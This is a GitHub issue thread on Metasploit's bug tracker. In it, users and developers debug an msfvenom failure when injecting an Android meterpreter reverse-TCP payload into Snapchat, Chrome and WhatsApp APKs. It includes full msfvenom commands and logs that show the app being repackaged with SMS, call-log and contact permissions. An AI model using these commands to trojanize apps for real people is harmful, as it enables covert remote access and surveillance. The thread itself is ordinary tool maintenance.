### ISSUE TITLE
Msfvenom error with "Aligned.apk"

### ISSUE THREAD

**Issue by keviiin38** [rapid7/metasploit-framework#7617]
## Aligning error with msfvenom 

I try : 

> msfvenom -x snapchat.apk -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1234 -o snapchat_payload.apk

And i get this output/error : 

> Using APK template: snapchat.apk
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating hook point..
[*] Adding payload as package com.snapchat.android
[*] Loading /tmp/d20161127-2760-1722k62/original/smali/com/snapchat/android/LandingPageActivity.smali and injecting payload..
[*] Poisoning the manifest with meterpreter permissions..
[*] Adding android.permission.ACCESS_COURSE_LOCATION
[*] Adding android.permission.SEND_SMS
[*] Adding android.permission.CALL_PHONE
[*] Adding android.permission.WRITE_CONTACTS
[*] Adding android.permission.WRITE_SETTINGS
[*] Adding android.permission.READ_SMS
[*] Adding android.permission.RECEIVE_BOOT_COMPLETED
[*] Adding android.permission.SET_WALLPAPER
[*] Adding android.permission.READ_CALL_LOG
[*] Adding android.permission.WRITE_CALL_LOG
[*] Rebuilding snap.apk with meterpreter injection as /tmp/d20161127-2760-1722k62/output.apk
[*] Signing /tmp/d20161127-2760-1722k62/output.apk
[*] Aligning /tmp/d20161127-2760-1722k62/output.apk
**Error: No such file or directory @ rb_sysopen - /tmp/d20161127-2760-1722k62/aligned.apk**

I use this .apk

> https://www.apkmirror.com/apk/snap-inc/snapchat/snapchat-9-43-5-0-release/snapchat-9-43-5-0-android-apk-download/

### Metasploit version

metasploit v4.13.0-dev 

### I installed Metasploit with:

APT

### OS

Kali-Linux

**Comment by timwr** [comment]
I can reproduce this. I think it's an issue with apktool.

**Comment by dana-at-cp** [comment]
@timwr If you have other stuff to focus on then I can work on fixing this issue.

**Comment by dana-at-cp** [comment]
@timwr I tested this with the exact APK referenced by @keviiin38 and the Apktool output suggests that there is a problem with the APK itself. It was probably tampered with before being uploaded on apkmirror.

```
msfdev@ubuntu:/tmp/d20161202-19528-vg390d$ ls
original  original.apk  payload  payload.apk  signing.keystore
[ruby-]
msfdev@ubuntu:/tmp/d20161202-19528-vg390d$ apktool b -o output.apk original
I: Using Apktool 2.2.0
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
original/smali/com/snapchat/android/LandingPageActivity.smali[6054,4] Invalid register: v17. Must be between v0 and v15, inclusive.
Exception in thread "main" brut.androlib.AndrolibException: Could not smali file: com/snapchat/android/LandingPageActivity.smali
	at brut.androlib.src.SmaliBuilder.buildFile(SmaliBuilder.java:67)
	at brut.androlib.src.SmaliBuilder.build(SmaliBuilder.java:51)
	at brut.androlib.src.SmaliBuilder.build(SmaliBuilder.java:38)
	at brut.androlib.Androlib.buildSourcesSmali(Androlib.java:400)
	at brut.androlib.Androlib.buildSources(Androlib.java:331)
	at brut.androlib.Androlib.build(Androlib.java:287)
	at brut.androlib.Androlib.build(Androlib.java:263)
	at brut.apktool.Main.cmdBuild(Main.java:224)
	at brut.apktool.Main.main(Main.java:84)
[ruby-]
msfdev@ubuntu:/tmp/d20161202-19528-vg390d$ ls
original  original.apk  payload  payload.apk  signing.keystore
[ruby-]
msfdev@ubuntu:/tmp/d20161202-19528-vg390d$
```
The bug in apk.rb is that there is no error checking at the Apktool recompilation step. An improvement would be to detect that the Apktool build fails and let the user know (log the cause of course too).

**Comment by dana-at-cp** [comment]
@timwr FYI. I tested the latest version of SnapChat from the Google Play store and Apktool choked on the same smali file during the recompilation step:

```
msfdev@ubuntu:~/Code/github/metasploit-framework$ ./msfvenom -x ~/Android/Snapchat_9.44.1.0.apk -p android/meterpreter/reverse_tcp LHOST=10.6.9.37 LPORT=1337 -o SnapRat.apk
WARNING: Local file /home/msfdev/Code/github/metasploit-framework/data/android/meterpreter.dex is being used
WARNING: Local files may be incompatible with the Metasploit Framework
WARNING: Local file /home/msfdev/Code/github/metasploit-framework/data/android/apk is being used
WARNING: Local file /home/msfdev/Code/github/metasploit-framework/data/android/apk/classes.dex is being used
Using APK template: /home/msfdev/Android/Snapchat_9.44.1.0.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating hook point..
[*] Adding payload as package com.snapchat.android
[*] Loading /tmp/d20161202-42636-jpu22j/original/smali/com/snapchat/android/LandingPageActivity.smali and injecting payload..
[*] Poisoning the manifest with meterpreter permissions..
[*] Adding android.permission.ACCESS_COURSE_LOCATION
[*] Adding android.permission.SEND_SMS
[*] Adding android.permission.CALL_PHONE
[*] Adding android.permission.WRITE_CONTACTS
[*] Adding android.permission.WRITE_SETTINGS
[*] Adding android.permission.READ_SMS
[*] Adding android.permission.RECEIVE_BOOT_COMPLETED
[*] Adding android.permission.SET_WALLPAPER
[*] Adding android.permission.READ_CALL_LOG
[*] Adding android.permission.WRITE_CALL_LOG
[*] Rebuilding /home/msfdev/Android/Snapchat_9.44.1.0.apk with meterpreter injection as /tmp/d20161202-42636-jpu22j/output.apk
[*] Signing /tmp/d20161202-42636-jpu22j/output.apk
[*] Aligning /tmp/d20161202-42636-jpu22j/output.apk
Error: No such file or directory @ rb_sysopen - /tmp/d20161202-42636-jpu22j/aligned.apk
[ruby-2.3.3@metasploit-framework](master) 
msfdev@ubuntu:~/Code/github/metasploit-framework$
```

Here's the attempt to manually do the recompilation:

```
msfdev@ubuntu:/tmp/d20161202-42636-jpu22j$ ls
original  original.apk  payload  payload.apk  signing.keystore
[ruby-]
msfdev@ubuntu:/tmp/d20161202-42636-jpu22j$ apktool b -o output.apk original
I: Using Apktool 2.2.0
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
original/smali/com/snapchat/android/LandingPageActivity.smali[6347,4] Invalid register: v17. Must be between v0 and v15, inclusive.
Exception in thread "main" brut.androlib.AndrolibException: Could not smali file: com/snapchat/android/LandingPageActivity.smali
	at brut.androlib.src.SmaliBuilder.buildFile(SmaliBuilder.java:67)
	at brut.androlib.src.SmaliBuilder.build(SmaliBuilder.java:51)
	at brut.androlib.src.SmaliBuilder.build(SmaliBuilder.java:38)
	at brut.androlib.Androlib.buildSourcesSmali(Androlib.java:400)
	at brut.androlib.Androlib.buildSources(Androlib.java:331)
	at brut.androlib.Androlib.build(Androlib.java:287)
	at brut.androlib.Androlib.build(Androlib.java:263)
	at brut.apktool.Main.cmdBuild(Main.java:224)
	at brut.apktool.Main.main(Main.java:84)
[ruby-]
msfdev@ubuntu:/tmp/d20161202-42636-jpu22j$
```

**Comment by islamTaha12** [comment]
same issue with chrome app
![screenshot from 2016-12-19 15-37-37](https://cloud.githubusercontent.com/assets/17981089/21314745/56350ee8-c601-11e6-96b6-c82f1eeaffc0.png)


**App source**
https://apkpure.com/chrome-browser-google/com.android.chrome

**Comment by boomtnt46** [comment]
Same with WhatsApp Beta apk.
(I am using Linux Mint 18.1).
![snapshot22](https://cloud.githubusercontent.com/assets/8796790/22074214/e7265638-dda7-11e6-9456-058baff4a8c0.png)

**Comment by busterb** [comment]
Do any of you guys have 'zipalign' in your path?

**Comment by boomtnt46** [comment]
I do.
